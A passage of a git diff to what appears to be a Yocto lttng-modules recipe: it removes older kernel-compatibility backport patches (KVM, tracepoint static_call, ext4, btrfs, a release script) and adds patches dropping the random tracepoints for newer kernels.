69 #include <../../arch/x86/kvm/mmutrace.h>
70 #endif
71
72+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
73+#include <../arch/x86/kvm/mmu.h>
74+#include <../arch/x86/kvm/mmu/spte.h>
75+#endif
76+
77 #undef TRACE_INCLUDE_PATH
78 #undef TRACE_INCLUDE_FILE
79
80--
812.25.1
82
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0008-fix-KVM-x86-mmu-Return-unique-RET_PF_-values-if-the-.patch b/meta/recipes-kernel/lttng/lttng-modules/0008-fix-KVM-x86-mmu-Return-unique-RET_PF_-values-if-the-.patch
deleted file mode 100644
index a71bb728f0..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0008-fix-KVM-x86-mmu-Return-unique-RET_PF_-values-if-the-.patch
+++ /dev/null
@@ -1,71 +0,0 @@
1From 14bbccffa579f4d66e2900843d6afae1294ce7c8 Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Mon, 26 Oct 2020 17:07:13 -0400
4Subject: [PATCH 08/16] fix: KVM: x86/mmu: Return unique RET_PF_* values if the
5 fault was fixed (v5.10)
6
7See upstream commit :
8
9 commit c4371c2a682e0da1ed2cd7e3c5496f055d873554
10 Author: Sean Christopherson <sean.j.christopherson@intel.com>
11 Date: Wed Sep 23 15:04:24 2020 -0700
12
13 KVM: x86/mmu: Return unique RET_PF_* values if the fault was fixed
14
15 Introduce RET_PF_FIXED and RET_PF_SPURIOUS to provide unique return
16 values instead of overloading RET_PF_RETRY. In the short term, the
17 unique values add clarity to the code and RET_PF_SPURIOUS will be used
18 by set_spte() to avoid unnecessary work for spurious faults.
19
20 In the long term, TDX will use RET_PF_FIXED to deterministically map
21 memory during pre-boot. The page fault flow may bail early for benign
22 reasons, e.g. if the mmu_notifier fires for an unrelated address. With
23 only RET_PF_RETRY, it's impossible for the caller to distinguish between
24 "cool, page is mapped" and "darn, need to try again", and thus cannot
25 handle benign cases like the mmu_notifier retry.
26
27Upstream-Status: Backport
28
29Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
30Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
31Change-Id: Ie0855c78852b45f588e131fe2463e15aae1bc023
32---
33 .../lttng-module/arch/x86/kvm/mmutrace.h | 22 ++++++++++++++++++-
34 1 file changed, 21 insertions(+), 1 deletion(-)
35
36diff --git a/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h b/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h
37index 86717835..cdf0609f 100644
38--- a/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h
39+++ b/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h
40@@ -233,7 +233,27 @@ LTTNG_TRACEPOINT_EVENT_MAP(
41 )
42 )
43
44-#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,6,0) || \
45+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
46+LTTNG_TRACEPOINT_EVENT_MAP(
47+ fast_page_fault,
48+
49+ kvm_mmu_fast_page_fault,
50+
51+ TP_PROTO(struct kvm_vcpu *vcpu, gpa_t cr2_or_gpa, u32 error_code,
52+ u64 *sptep, u64 old_spte, int ret),
53+ TP_ARGS(vcpu, cr2_or_gpa, error_code, sptep, old_spte, ret),
54+
55+ TP_FIELDS(
56+ ctf_integer(int, vcpu_id, vcpu->vcpu_id)
57+ ctf_integer(gpa_t, cr2_or_gpa, cr2_or_gpa)
58+ ctf_integer(u32, error_code, error_code)
59+ ctf_integer_hex(u64 *, sptep, sptep)
60+ ctf_integer(u64, old_spte, old_spte)
61+ ctf_integer(u64, new_spte, *sptep)
62+ ctf_integer(int, ret, ret)
63+ )
64+)
65+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(5,6,0) || \
66 LTTNG_KERNEL_RANGE(4,19,103, 4,20,0) || \
67 LTTNG_KERNEL_RANGE(5,4,19, 5,5,0) || \
68 LTTNG_KERNEL_RANGE(5,5,3, 5,6,0) || \
69--
702.25.1
71
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0009-fix-tracepoint-Optimize-using-static_call-v5.10.patch b/meta/recipes-kernel/lttng/lttng-modules/0009-fix-tracepoint-Optimize-using-static_call-v5.10.patch
deleted file mode 100644
index b942aa5c95..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0009-fix-tracepoint-Optimize-using-static_call-v5.10.patch
+++ /dev/null
@@ -1,155 +0,0 @@
1From c6b31b349fe901a8f586a66064f9e9b15449ac1c Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Mon, 26 Oct 2020 17:09:05 -0400
4Subject: [PATCH 09/16] fix: tracepoint: Optimize using static_call() (v5.10)
5
6See upstream commit :
7
8 commit d25e37d89dd2f41d7acae0429039d2f0ae8b4a07
9 Author: Steven Rostedt (VMware) <rostedt@goodmis.org>
10 Date: Tue Aug 18 15:57:52 2020 +0200
11
12 tracepoint: Optimize using static_call()
13
14 Currently the tracepoint site will iterate a vector and issue indirect
15 calls to however many handlers are registered (ie. the vector is
16 long).
17
18 Using static_call() it is possible to optimize this for the common
19 case of only having a single handler registered. In this case the
20 static_call() can directly call this handler. Otherwise, if the vector
21 is longer than 1, call a function that iterates the whole vector like
22 the current code.
23
24Upstream-Status: Backport
25
26Change-Id: I739dd84d62cc1a821b8bd8acff74fa29aa25d22f
27Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
28Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
29---
30 lttng-statedump-impl.c | 44 ++++++++++++++++++++++++++++++++-------
31 probes/lttng.c | 7 +++++--
32 tests/probes/lttng-test.c | 7 ++++++-
33 wrapper/tracepoint.h | 8 +++++++
34 4 files changed, 56 insertions(+), 10 deletions(-)
35
36diff --git a/lttng-statedump-impl.c b/lttng-statedump-impl.c
37index 54a309d1..e0b19b42 100644
38--- a/lttng-statedump-impl.c
39+++ b/lttng-statedump-impl.c
40@@ -55,13 +55,43 @@
41 #define LTTNG_INSTRUMENTATION
42 #include <instrumentation/events/lttng-module/lttng-statedump.h>
43
44-DEFINE_TRACE(lttng_statedump_block_device);
45-DEFINE_TRACE(lttng_statedump_end);
46-DEFINE_TRACE(lttng_statedump_interrupt);
47-DEFINE_TRACE(lttng_statedump_file_descriptor);
48-DEFINE_TRACE(lttng_statedump_start);
49-DEFINE_TRACE(lttng_statedump_process_state);
50-DEFINE_TRACE(lttng_statedump_network_interface);
51+LTTNG_DEFINE_TRACE(lttng_statedump_block_device,
52+ TP_PROTO(struct lttng_session *session,
53+ dev_t dev, const char *diskname),
54+ TP_ARGS(session, dev, diskname));
55+
56+LTTNG_DEFINE_TRACE(lttng_statedump_end,
57+ TP_PROTO(struct lttng_session *session),
58+ TP_ARGS(session));
59+
60+LTTNG_DEFINE_TRACE(lttng_statedump_interrupt,
61+ TP_PROTO(struct lttng_session *session,
62+ unsigned int irq, const char *chip_name,
63+ struct irqaction *action),
64+ TP_ARGS(session, irq, chip_name, action));
65+
66+LTTNG_DEFINE_TRACE(lttng_statedump_file_descriptor,
67+ TP_PROTO(struct lttng_session *session,
68+ struct files_struct *files,
69+ int fd, const char *filename,
70+ unsigned int flags, fmode_t fmode),
71+ TP_ARGS(session, files, fd, filename, flags, fmode));
72+
73+LTTNG_DEFINE_TRACE(lttng_statedump_start,
74+ TP_PROTO(struct lttng_session *session),
75+ TP_ARGS(session));
76+
77+LTTNG_DEFINE_TRACE(lttng_statedump_process_state,
78+ TP_PROTO(struct lttng_session *session,
79+ struct task_struct *p,
80+ int type, int mode, int submode, int status,
81+ struct files_struct *files),
82+ TP_ARGS(session, p, type, mode, submode, status, files));
83+
84+LTTNG_DEFINE_TRACE(lttng_statedump_network_interface,
85+ TP_PROTO(struct lttng_session *session,
86+ struct net_device *dev, struct in_ifaddr *ifa),
87+ TP_ARGS(session, dev, ifa));
88
89 struct lttng_fd_ctx {
90 char *page;
91diff --git a/probes/lttng.c b/probes/lttng.c
92index 05bc1388..7ddaa69f 100644
93--- a/probes/lttng.c
94+++ b/probes/lttng.c
95@@ -8,7 +8,7 @@
96 */
97
98 #include <linux/module.h>
99-#include <linux/tracepoint.h>
100+#include <wrapper/tracepoint.h>
101 #include <linux/uaccess.h>
102 #include <linux/gfp.h>
103 #include <linux/fs.h>
104@@ -32,7 +32,10 @@
105 #define LTTNG_LOGGER_COUNT_MAX 1024
106 #define LTTNG_LOGGER_FILE "lttng-logger"
107
108-DEFINE_TRACE(lttng_logger);
109+LTTNG_DEFINE_TRACE(lttng_logger,
110+ PARAMS(const char __user *text, size_t len),
111+ PARAMS(text, len)
112+);
113
114 static struct proc_dir_entry *lttng_logger_dentry;
115
116diff --git a/tests/probes/lttng-test.c b/tests/probes/lttng-test.c
117index c728bed5..8f2d3feb 100644
118--- a/tests/probes/lttng-test.c
119+++ b/tests/probes/lttng-test.c
120@@ -26,7 +26,12 @@
121 #define LTTNG_INSTRUMENTATION
122 #include <instrumentation/events/lttng-module/lttng-test.h>
123
124-DEFINE_TRACE(lttng_test_filter_event);
125+LTTNG_DEFINE_TRACE(lttng_test_filter_event,
126+ PARAMS(int anint, int netint, long *values,
127+ char *text, size_t textlen,
128+ char *etext, uint32_t * net_values),
129+ PARAMS(anint, netint, values, text, textlen, etext, net_values)
130+);
131
132 #define LTTNG_TEST_FILTER_EVENT_FILE "lttng-test-filter-event"
133
134diff --git a/wrapper/tracepoint.h b/wrapper/tracepoint.h
135index 3883e11a..758038b6 100644
136--- a/wrapper/tracepoint.h
137+++ b/wrapper/tracepoint.h
138@@ -20,6 +20,14 @@
139
140 #endif
141
142+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
143+#define LTTNG_DEFINE_TRACE(name, proto, args) \
144+ DEFINE_TRACE(name, PARAMS(proto), PARAMS(args))
145+#else
146+#define LTTNG_DEFINE_TRACE(name, proto, args) \
147+ DEFINE_TRACE(name)
148+#endif
149+
150 #ifndef HAVE_KABI_2635_TRACEPOINT
151
152 #define kabi_2635_tracepoint_probe_register tracepoint_probe_register
153--
1542.25.1
155
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0010-fix-include-order-for-older-kernels.patch b/meta/recipes-kernel/lttng/lttng-modules/0010-fix-include-order-for-older-kernels.patch
deleted file mode 100644
index 250e9c6261..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0010-fix-include-order-for-older-kernels.patch
+++ /dev/null
@@ -1,31 +0,0 @@
1From 2ce89d35c9477d8c17c00489c72e1548e16af9b9 Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Fri, 20 Nov 2020 11:42:30 -0500
4Subject: [PATCH 10/16] fix: include order for older kernels
5
6Fixes a build failure on v3.0 and v3.1.
7
8Upstream-Status: Backport
9
10Change-Id: Ic48512d2aa5ee46678e67d147b92dba6d0959615
11Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
12Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
13---
14 lttng-events.h | 1 +
15 1 file changed, 1 insertion(+)
16
17diff --git a/lttng-events.h b/lttng-events.h
18index 099fd78b..f5cc57c6 100644
19--- a/lttng-events.h
20+++ b/lttng-events.h
21@@ -16,6 +16,7 @@
22 #include <linux/kref.h>
23 #include <lttng-cpuhotplug.h>
24 #include <linux/uuid.h>
25+#include <linux/irq_work.h>
26 #include <wrapper/uprobes.h>
27 #include <lttng-tracer.h>
28 #include <lttng-abi.h>
29--
302.25.1
31
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0011-Add-release-maintainer-script.patch b/meta/recipes-kernel/lttng/lttng-modules/0011-Add-release-maintainer-script.patch
deleted file mode 100644
index d25d64b9de..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0011-Add-release-maintainer-script.patch
+++ /dev/null
@@ -1,59 +0,0 @@
1From 22ffa48439e617a32556365e00827fba062c5688 Mon Sep 17 00:00:00 2001
2From: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
3Date: Mon, 23 Nov 2020 10:49:57 -0500
4Subject: [PATCH 11/16] Add release maintainer script
5
6Upstream-Status: Backport
7
8Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
9---
10 scripts/maintainer/do-release.sh | 37 ++++++++++++++++++++++++++++++++
11 1 file changed, 37 insertions(+)
12 create mode 100755 scripts/maintainer/do-release.sh
13
14diff --git a/scripts/maintainer/do-release.sh b/scripts/maintainer/do-release.sh
15new file mode 100755
16index 00000000..e0cec167
17--- /dev/null
18+++ b/scripts/maintainer/do-release.sh
19@@ -0,0 +1,37 @@
20+#!/bin/sh
21+
22+# invoke with do-release 2.N.M, or 2.N.M-rcXX
23+
24+REL=$1
25+SRCDIR=~/git/lttng-modules
26+# The output files are created in ${HOME}/stable/
27+OUTPUTDIR=${HOME}/stable
28+
29+if [ x"$1" = x"" ]; then
30+ echo "1 arg : VERSION";
31+ exit 1;
32+fi
33+
34+cd ${OUTPUTDIR}
35+
36+echo Doing LTTng modules release ${REL}
37+
38+mkdir lttng-modules-${REL}
39+cd lttng-modules-${REL}
40+cp -ax ${SRCDIR}/. .
41+
42+#cleanup
43+make clean
44+git clean -xdf
45+
46+for a in \*.orig \*.rej Module.markers Module.symvers; do
47+ find . -name "${a}" -exec rm '{}' \;;
48+done
49+for a in outgoing .tmp_versions .git .pc; do
50+ find . -name "${a}" -exec rm -rf '{}' \;;
51+done
52+
53+cd ..
54+tar cvfj lttng-modules-${REL}.tar.bz2 lttng-modules-${REL}
55+mksums lttng-modules-${REL}.tar.bz2
56+signpkg lttng-modules-${REL}.tar.bz2
57--
582.25.1
59
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0012-Improve-the-release-script.patch b/meta/recipes-kernel/lttng/lttng-modules/0012-Improve-the-release-script.patch
deleted file mode 100644
index f5e7fb55a2..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0012-Improve-the-release-script.patch
+++ /dev/null
@@ -1,173 +0,0 @@
1From a241d30fa82ed0be1026f14e36e8bd2b0e65740d Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Mon, 23 Nov 2020 12:15:43 -0500
4Subject: [PATCH 12/16] Improve the release script
5
6 * Use git-archive, this removes all custom code to cleanup the repo, it
7 can now be used in an unclean repo as the code will be exported from
8 a specific tag.
9 * Add parameters, this will allow using the script on any machine
10 while keeping the default behavior for the maintainer.
11
12Upstream-Status: Backport
13
14Change-Id: I9f29d0e1afdbf475d0bbaeb9946ca3216f725e86
15Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
16Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
17---
18 .gitattributes | 3 +
19 scripts/maintainer/do-release.sh | 121 +++++++++++++++++++++++++------
20 2 files changed, 100 insertions(+), 24 deletions(-)
21 create mode 100644 .gitattributes
22
23diff --git a/.gitattributes b/.gitattributes
24new file mode 100644
25index 00000000..7839355a
26--- /dev/null
27+++ b/.gitattributes
28@@ -0,0 +1,3 @@
29+.gitattributes export-ignore
30+.gitignore export-ignore
31+.gitreview export-ignore
32diff --git a/scripts/maintainer/do-release.sh b/scripts/maintainer/do-release.sh
33index e0cec167..5e94e136 100755
34--- a/scripts/maintainer/do-release.sh
35+++ b/scripts/maintainer/do-release.sh
36@@ -1,37 +1,110 @@
37-#!/bin/sh
38+#!/bin/bash
39+
40+set -eu
41+set -o pipefail
42
43 # invoke with do-release 2.N.M, or 2.N.M-rcXX
44
45-REL=$1
46-SRCDIR=~/git/lttng-modules
47+# Default maintainer values
48+SRCDIR="${HOME}/git/lttng-modules"
49 # The output files are created in ${HOME}/stable/
50-OUTPUTDIR=${HOME}/stable
51+OUTPUTDIR="${HOME}/stable"
52+SIGN="yes"
53+VERBOSE=""
54+
55+usage() {
56+ echo "Usage: do-release.sh [OPTION]... RELEASE"
57+ echo
58+ echo "Mandatory arguments to long options are mandatory for short options too."
59+ echo " -s, --srcdir DIR source directory"
60+ echo " -o, --outputdir DIR output directory, must exist"
61+ echo " -n, --no-sign don't GPG sign the output archive"
62+ echo " -v, --verbose verbose command output"
63+}
64+
65+POS_ARGS=()
66+while [[ $# -gt 0 ]]
67+do
68+ arg="$1"
69+
70+ case $arg in
71+ -n|--no-sign)
72+ SIGN="no"
73+ shift 1
74+ ;;
75+
76+ -s|--srcdir)
77+ SRCDIR="$2"
78+ shift 2
79+ ;;
80+
81+ -o|--outputdir)
82+ OUTPUTDIR="$2"
83+ shift 2
84+ ;;
85+
86+ -v|--verbose)
87+ VERBOSE="-v"
88+ shift 1
89+ ;;
90+
91+ # Catch unknown arguments
92+ -*)
93+ usage
94+ exit 1
95+ ;;
96+
97+ *)
98+ POS_ARGS+=("$1")
99+ shift
100+ ;;
101+ esac
102+done
103+set -- "${POS_ARGS[@]}"
104
105-if [ x"$1" = x"" ]; then
106- echo "1 arg : VERSION";
107+REL=${1:-}
108+
109+if [ x"${REL}" = x"" ]; then
110+ usage
111 exit 1;
112 fi
113
114-cd ${OUTPUTDIR}
115+echo "Doing LTTng modules release ${REL}"
116+echo " Source dir: ${SRCDIR}"
117+echo " Output dir: ${OUTPUTDIR}"
118+echo " GPG sign: ${SIGN}"
119
120-echo Doing LTTng modules release ${REL}
121+# Make sure the output directory exists
122+if [ ! -d "${OUTPUTDIR}" ]; then
123+ echo "Output directory '${OUTPUTDIR}' doesn't exist."
124+ exit 1
125+fi
126
127-mkdir lttng-modules-${REL}
128-cd lttng-modules-${REL}
129-cp -ax ${SRCDIR}/. .
130+# Make sure the source directory is a git repository
131+if [ ! -r "${SRCDIR}/.git/config" ]; then
132+ echo "Source directory '${SRCDIR}' isn't a git repository."
133+ exit 1
134+fi
135
136-#cleanup
137-make clean
138-git clean -xdf
139+# Set the git repo directory for all further git commands
140+export GIT_DIR="${SRCDIR}/.git/"
141
142-for a in \*.orig \*.rej Module.markers Module.symvers; do
143- find . -name "${a}" -exec rm '{}' \;;
144-done
145-for a in outgoing .tmp_versions .git .pc; do
146- find . -name "${a}" -exec rm -rf '{}' \;;
147-done
148+# Check if the release tag exists
149+if ! git rev-parse "refs/tags/v${REL}" >/dev/null 2>&1; then
150+ echo "Release tag 'v${REL}' doesn't exist."
151+ exit 1
152+fi
153+
154+# Generate the compressed tar archive, the git attributes from the tag will be used.
155+git archive $VERBOSE --format=tar --prefix="lttng-modules-${REL}/" "v${REL}" | bzip2 > "${OUTPUTDIR}/lttng-modules-${REL}.tar.bz2"
156
157-cd ..
158-tar cvfj lttng-modules-${REL}.tar.bz2 lttng-modules-${REL}
159-mksums lttng-modules-${REL}.tar.bz2
160-signpkg lttng-modules-${REL}.tar.bz2
161+pushd "${OUTPUTDIR}" >/dev/null
162+# Generate the hashes
163+md5sum "lttng-modules-${REL}.tar.bz2" > "lttng-modules-${REL}.tar.bz2.md5"
164+sha256sum "lttng-modules-${REL}.tar.bz2" > "lttng-modules-${REL}.tar.bz2.sha256"
165+
166+if [ "x${SIGN}" = "xyes" ]; then
167+ # Sign with the default key
168+ gpg --armor -b "lttng-modules-${REL}.tar.bz2"
169+fi
170+popd >/dev/null
171--
1722.25.1
173
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0013-fix-backport-of-fix-ext4-fast-commit-recovery-path-v.patch b/meta/recipes-kernel/lttng/lttng-modules/0013-fix-backport-of-fix-ext4-fast-commit-recovery-path-v.patch
deleted file mode 100644
index f6288923e1..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0013-fix-backport-of-fix-ext4-fast-commit-recovery-path-v.patch
+++ /dev/null
@@ -1,32 +0,0 @@
1From 59fcc704bea8ecf4bd401e744df41e3331359524 Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Mon, 23 Nov 2020 10:19:52 -0500
4Subject: [PATCH 13/16] fix: backport of fix: ext4: fast commit recovery path
5 (v5.10)
6
7Add missing '#endif'.
8
9Upstream-Status: Backport
10
11Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
12Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
13Change-Id: I43349d685d7ed740b32ce992be0c2e7e6f12c799
14---
15 instrumentation/events/lttng-module/ext4.h | 1 +
16 1 file changed, 1 insertion(+)
17
18diff --git a/instrumentation/events/lttng-module/ext4.h b/instrumentation/events/lttng-module/ext4.h
19index 5fddccad..d454fa6e 100644
20--- a/instrumentation/events/lttng-module/ext4.h
21+++ b/instrumentation/events/lttng-module/ext4.h
22@@ -1446,6 +1446,7 @@ LTTNG_TRACEPOINT_EVENT(ext4_load_inode,
23 )
24 )
25 #endif
26+#endif
27
28 #if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,5,0))
29
30--
312.25.1
32
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0014-Revert-fix-include-order-for-older-kernels.patch b/meta/recipes-kernel/lttng/lttng-modules/0014-Revert-fix-include-order-for-older-kernels.patch
deleted file mode 100644
index 446391a832..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0014-Revert-fix-include-order-for-older-kernels.patch
+++ /dev/null
@@ -1,32 +0,0 @@
1From b2df75dd378ce5260bb51872e43ac1d76fbf4588 Mon Sep 17 00:00:00 2001
2From: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
3Date: Mon, 23 Nov 2020 14:21:51 -0500
4Subject: [PATCH 14/16] Revert "fix: include order for older kernels"
5
6This reverts commit 2ce89d35c9477d8c17c00489c72e1548e16af9b9.
7
8This commit is only needed for master and stable-2.12, because
9stable-2.11 does not include irq_work.h.
10
11Upstream-Status: Backport
12
13Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
14---
15 lttng-events.h | 1 -
16 1 file changed, 1 deletion(-)
17
18diff --git a/lttng-events.h b/lttng-events.h
19index f5cc57c6..099fd78b 100644
20--- a/lttng-events.h
21+++ b/lttng-events.h
22@@ -16,7 +16,6 @@
23 #include <linux/kref.h>
24 #include <lttng-cpuhotplug.h>
25 #include <linux/uuid.h>
26-#include <linux/irq_work.h>
27 #include <wrapper/uprobes.h>
28 #include <lttng-tracer.h>
29 #include <lttng-abi.h>
30--
312.25.1
32
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0015-fix-backport-of-fix-tracepoint-Optimize-using-static.patch b/meta/recipes-kernel/lttng/lttng-modules/0015-fix-backport-of-fix-tracepoint-Optimize-using-static.patch
deleted file mode 100644
index 1ff10d48da..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0015-fix-backport-of-fix-tracepoint-Optimize-using-static.patch
+++ /dev/null
@@ -1,46 +0,0 @@
1From f8922333020aaa267e17fb23180b56c4c16ebe9e Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Tue, 24 Nov 2020 11:11:42 -0500
4Subject: [PATCH 15/16] fix: backport of fix: tracepoint: Optimize using
5 static_call() (v5.10)
6
7Upstream-Status: Backport
8
9Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
10Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
11Change-Id: I94f2b845f11654e639f03254185980de527a4ca8
12---
13 lttng-statedump-impl.c | 9 ++++-----
14 1 file changed, 4 insertions(+), 5 deletions(-)
15
16diff --git a/lttng-statedump-impl.c b/lttng-statedump-impl.c
17index e0b19b42..a8c32db5 100644
18--- a/lttng-statedump-impl.c
19+++ b/lttng-statedump-impl.c
20@@ -72,10 +72,9 @@ LTTNG_DEFINE_TRACE(lttng_statedump_interrupt,
21
22 LTTNG_DEFINE_TRACE(lttng_statedump_file_descriptor,
23 TP_PROTO(struct lttng_session *session,
24- struct files_struct *files,
25- int fd, const char *filename,
26+ struct task_struct *p, int fd, const char *filename,
27 unsigned int flags, fmode_t fmode),
28- TP_ARGS(session, files, fd, filename, flags, fmode));
29+ TP_ARGS(session, p, fd, filename, flags, fmode));
30
31 LTTNG_DEFINE_TRACE(lttng_statedump_start,
32 TP_PROTO(struct lttng_session *session),
33@@ -85,8 +84,8 @@ LTTNG_DEFINE_TRACE(lttng_statedump_process_state,
34 TP_PROTO(struct lttng_session *session,
35 struct task_struct *p,
36 int type, int mode, int submode, int status,
37- struct files_struct *files),
38- TP_ARGS(session, p, type, mode, submode, status, files));
39+ struct pid_namespace *pid_ns),
40+ TP_ARGS(session, p, type, mode, submode, status, pid_ns));
41
42 LTTNG_DEFINE_TRACE(lttng_statedump_network_interface,
43 TP_PROTO(struct lttng_session *session,
44--
452.25.1
46
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0016-fix-adjust-version-range-for-trace_find_free_extent.patch b/meta/recipes-kernel/lttng/lttng-modules/0016-fix-adjust-version-range-for-trace_find_free_extent.patch
deleted file mode 100644
index 59d4d7afa7..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0016-fix-adjust-version-range-for-trace_find_free_extent.patch
+++ /dev/null
@@ -1,30 +0,0 @@
1From 5c3e67d7994097cc75f45258b7518aacb55dde1b Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Tue, 24 Nov 2020 11:27:18 -0500
4Subject: [PATCH 16/16] fix: adjust version range for trace_find_free_extent()
5
6Upstream-Status: Backport
7
8Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
9Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
10Change-Id: Iaa6088092cf58b4d29d55f3ff9586c57ae272302
11---
12 instrumentation/events/lttng-module/btrfs.h | 2 +-
13 1 file changed, 1 insertion(+), 1 deletion(-)
14
15diff --git a/instrumentation/events/lttng-module/btrfs.h b/instrumentation/events/lttng-module/btrfs.h
16index d47f3280..efe7af96 100644
17--- a/instrumentation/events/lttng-module/btrfs.h
18+++ b/instrumentation/events/lttng-module/btrfs.h
19@@ -1917,7 +1917,7 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__reserved_extent, btrfs_reserved_extent_f
20 #endif /* #else #if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,10,0)) */
21
22 #if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0) || \
23- LTTNG_KERNEL_RANGE(5,9,6, 5,10,0) || \
24+ LTTNG_KERNEL_RANGE(5,9,5, 5,10,0) || \
25 LTTNG_KERNEL_RANGE(5,4,78, 5,5,0))
26 LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
27
28--
292.25.1
30
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch b/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch
new file mode 100644
index 0000000000..3fc7fd733d
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch
@@ -0,0 +1,46 @@
1From 25b70c486bb96de0caf7cea1da42ed07801cca84 Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Mon, 4 Apr 2022 14:33:42 -0400
4Subject: [PATCH 17/19] fix: random: remove unused tracepoints (v5.18)
5
6See upstream commit :
7
8 commit 14c174633f349cb41ea90c2c0aaddac157012f74
9 Author: Jason A. Donenfeld <Jason@zx2c4.com>
10 Date: Thu Feb 10 16:40:44 2022 +0100
11
12 random: remove unused tracepoints
13
14 These explicit tracepoints aren't really used and show sign of aging.
15 It's work to keep these up to date, and before I attempted to keep them
16 up to date, they weren't up to date, which indicates that they're not
17 really used. These days there are better ways of introspecting anyway.
18
19Upstream-Status: Backport [369d82bb1746447514c877088d7c5fd0f39140f8]
20Change-Id: I3b8c3e2732e7efdd76ce63204ac53a48784d0df6
21Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
22Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
23---
24 probes/Kbuild | 5 ++++-
25 1 file changed, 4 insertions(+), 1 deletion(-)
26
27diff --git a/probes/Kbuild b/probes/Kbuild
28index 3ae2d39e..58da82b8 100644
29--- a/probes/Kbuild
30+++ b/probes/Kbuild
31@@ -215,8 +215,11 @@ ifneq ($(CONFIG_FRAME_WARN),0)
32 CFLAGS_lttng-probe-printk.o += -Wframe-larger-than=2200
33 endif
34
35+# Introduced in v3.6, remove in v5.18
36 obj-$(CONFIG_LTTNG) += $(shell \
37- if [ $(VERSION) -ge 4 \
38+ if [ \( ! \( $(VERSION) -ge 6 -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \) \) \
39+ -a \
40+ $(VERSION) -ge 4 \
41 -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
42 -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 5 -a $(SUBLEVEL) -ge 2 \) \
43 -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 4 -a $(SUBLEVEL) -ge 9 \) \
44--
452.35.1
46
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch b/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch
new file mode 100644
index 0000000000..5c324a9bde
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch
@@ -0,0 +1,45 @@
1From da956d1444139883f5d01078d945078738ffade4 Mon Sep 17 00:00:00 2001
2From: He Zhe <zhe.he@windriver.com>
3Date: Thu, 2 Jun 2022 06:36:08 +0000
4Subject: [PATCH 18/19] fix: random: remove unused tracepoints (v5.10, v5.15)
5
